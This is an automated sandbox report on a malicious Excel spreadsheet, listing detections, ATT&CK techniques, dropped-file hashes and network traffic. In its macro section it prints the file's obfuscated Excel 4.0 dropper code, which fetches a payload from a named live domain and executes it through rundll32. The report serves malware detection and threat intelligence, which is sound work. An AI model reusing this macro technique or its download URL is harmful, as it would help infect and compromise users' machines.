Analysis Report 1A8C92C-1A8C92C.xls
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
AV Detection: |
---|
Antivirus detection for URL or domain |
Source: | Avira URL Cloud: |
Source: | File opened: |
Source: | Binary string: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) |
Source: | File created: |
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | IP Address: |
Source: | HTTP traffic detected: |
Source: | File created: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Office process drops PE file |
Source: | File created: |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: |
Source: | OLE indicator, Workbook stream: |
Source: | File read: |
Source: | Key opened: |
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: |
Source: | File created: |
Boot Survival: |
---|
Drops PE files to the user root directory |
Source: | File created: |
Source: | Process information set: | ||
Source: | Dropped PE file which has not been started: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Key value queried: |
MITRE ATT&CK Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | System Information Discovery3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting11 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll321 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Metadefender | Browse | ||
2% | ReversingLabs | Win32.Trojan.Trickpak | ||
5% | Metadefender | Browse | ||
2% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Crypt.XPACK.Gen | Download File |
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
100% | Avira URL Cloud | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
revolet-sa.com | 192.232.249.186 | true | false | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
192.232.249.186 | revolet-sa.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 383028 |
Start date: | 07.04.2021 |
Start time: | 07:09:08 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 30s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | 1A8C92C-1A8C92C.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal84.expl.evad.winXLS@7/8@1/1 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: |
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
07:09:39 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
192.232.249.186 | | | malicious | | |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
revolet-sa.com | | | malicious | | |
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
UNIFIEDLAYER-AS-1US | | | malicious | | |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3M1Xc[1].fbx | | | malicious | | |
C:\Users\user\sdbybsd.fds | | | malicious | | |
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | low |
IE Cache URL: | http://revolet-sa.com/files/countryyelow.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 67965 |
Entropy (8bit): | 7.879459857289466 |
Encrypted: | false |
SSDEEP: | 1536:Ltke3BrWGHJyW32AeWviHcM8OlMVGoIahaDHTU6hryF70E:LqeRrW2JyW32AiHD2sTU2yF70E |
MD5: | 9842F73BEBDA1F816A21C9C89EBF722C |
SHA1: | 44635E0DC6B4D2104DEB0812E58B62D69EE9D5A7 |
SHA-256: | 472A639EF51E8A9CDFD06E797CA8CF99C7BB85AEED79160D0F367D7784365155 |
SHA-512: | 1E1EAA02771CE00C5B036D53CED95C0CB3A436AD8A4825743870258FEBF0873D3DAADD006D2C81AEC38C2F5A5A654D8C8322BE2204FF5726AC08E43D483A3BDF |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\SysWOW64\rundll32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 7.012005948259818 |
Encrypted: | false |
SSDEEP: | 48:Kb6UYQ7XLdcm1BjUYKpnb6UY8tfeDof3zAI88Yehn:Kb6CFcm1BWnb6mfeofDf8In |
MD5: | 66EC936451064576E96053814B524D8E |
SHA1: | 9B0D556322E3776F656038D6324B2238DF7C83F1 |
SHA-256: | FAACB5E4238A45B5C6ECFEFA3820080F50C331FF2B95173AB47EF3AA4743731E |
SHA-512: | EEAC85A510219DA071735DFC3B35CA13E56F65E404D3609D1B1453B5F8D7A1DD5C8AD799EC3E13406B7232C3A08B20E17160DAE5F61D93866D480E0A352E33B9 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2078 |
Entropy (8bit): | 4.49395331622355 |
Encrypted: | false |
SSDEEP: | 48:8pxn/XT3IkcSeJozQqQh2pxn/XT3IkcSeJozQqQ/:8p9/XLIkqqzQqQh2p9/XLIkqqzQqQ/ |
MD5: | B9C87F86AB426BAB220239030DDDAA10 |
SHA1: | 69F13975ED848B8C8D8D3C998A3A9E4298C6E68E |
SHA-256: | F83451C275FA9E90AFB786F281A07F8CC0703E520ACBD9C18F8B0C8F433F8279 |
SHA-512: | 6A1685DCCCC5E146F07606B3AFA2F5B029F525108171B226860635A85BEBB45B25569659AD116BFCBC7E75F554C57AAEADD317F4317D283E44A4C57DD414BCBB |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.477005331237777 |
Encrypted: | false |
SSDEEP: | 12:85QBO3b3cLgXg/XAlCPCHaXgzB8IB/PxiUUDpX+Wnicvb8X+bDtZ3YilMMEpxRld:85hjK/XTwz6IbiJYePDv3qdwrNru/ |
MD5: | 0F73A8D021A01CD04B71B4D1081CBC66 |
SHA1: | C1E9F58BAA5178BD16B9B7322E28AEBD092B0DCF |
SHA-256: | F1D5434B6F42340A44592D8908A68513E429FA019BDA1D7887D4DEE412011997 |
SHA-512: | 19B9390DCE4DD7AA3008BE3526FCA7B5A694808CB338B65115C571C3A349601BB1E47937A8897C49409C4D18B70496BF31CCC605FB41544DB2B0607223D6729C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 98 |
Entropy (8bit): | 4.399426680408379 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMMk9WPulGmWPulmMMk9WPulv:dj6aWYrWxaW1 |
MD5: | 9D94E53C38653B25AE525F0CC2253B09 |
SHA1: | 90F33DAD1FCA3415C790A0072B9F07B05DF2A3BB |
SHA-256: | BE1F754789EF0A781C85FD38FC5D45C7B925D0A8636F3B02792F9F90E1ABE14C |
SHA-512: | 94F02CBB4B181764B0E5C9173B8473A8D274ECE8B5A39CC1FA20FEF7F09D770232E9A4CAF46B8180561087A3ED03EDF0D6B616DDF10F25136A0CCF4D1A7B1BB3 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 127008 |
Entropy (8bit): | 7.230491021864619 |
Encrypted: | false |
SSDEEP: | 3072:ZI8rmjAItyzElBIL6lECbgBGGP5xLmuCSi2jTUqyF70Si2W2vXmw5vXmwQI8rmjy:G8rmjAItyzElBIL6lECbgBvP5NmuCSh5 |
MD5: | 63317E50375F30B46FECFDE3EBADCC4A |
SHA1: | 09DF3BB631603B67550B02176C577ADFF1B810AB |
SHA-256: | D4F8728B67702276E5DF6DBDBCC2950D03E59DB7390D3348A0A6EA40AA68C9C2 |
SHA-512: | 384B7A81EE7CC6D6068280D19D8B1D020801DA2BF29EC0D63AF53B9DF683EBDD9406AEA8B11E566E0AEC944DBBABF8CC9B6259F87FB7B7BB04577E77B72E2D58 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.0873527347414935 |
TrID: |
|
File name: | 1A8C92C-1A8C92C.xls |
File size: | 267776 |
MD5: | d8ed80402de2b621219044b3a2c022c5 |
SHA1: | e2f86c9431081da7f57cc014a9f2f7b870ea0aad |
SHA256: | d98b11f1599985cc16c8dd10ea53ea5a1b9ac752d5d30c460c198b4a2a83ad9b |
SHA512: | 1bc7b3a5973019ded3a136824ea54653d3189d729e3e07a811082844829362c3f4dd78c478d2aaea0c0e044092d4d96cd0a6b1e8b7ccbb8ba89ad1814e723540 |
SSDEEP: | 6144:JcPiTQAVW/89BQnmlcGvgZ7rDjo8UOMIJK+xTh0E:FhE |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "1A8C92C-1A8C92C.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-04-06 14:04:37 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.342986545458 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c s 3 . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.247889866731 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . H L . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 255780 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 255780 |
Entropy: | 3.03349063455 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 1 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . |
Macro 4.0 Code |
---|
,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,
,,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)",,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=Docs1!$AX$27()",,,,,
=HALT()
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 07:09:59.474808931 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.474823952 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.474827051 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.474881887 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.474884033 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.474953890 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.474935055 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475022078 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475024939 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475086927 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475095987 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475142002 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475143909 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475197077 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475202084 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475260019 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475289106 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475316048 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475337982 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475347042 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475374937 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475425005 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475431919 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475496054 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475500107 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475553989 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475559950 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475617886 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475634098 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475676060 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475703955 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475730896 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475733995 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 07:09:58.392280102 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 07:09:58.546928883 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 7, 2021 07:09:58.392280102 CEST | 192.168.2.22 | 8.8.8.8 | 0x7e45 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 7, 2021 07:09:58.546928883 CEST | 8.8.8.8 | 192.168.2.22 | 0x7e45 | No error (0) | 192.232.249.186 | A (IP address) | IN (0x0001) |
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 192.232.249.186 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 07:09:58.734183073 CEST | 0 | OUT | |
Apr 7, 2021 07:09:59.150906086 CEST | 2 | IN |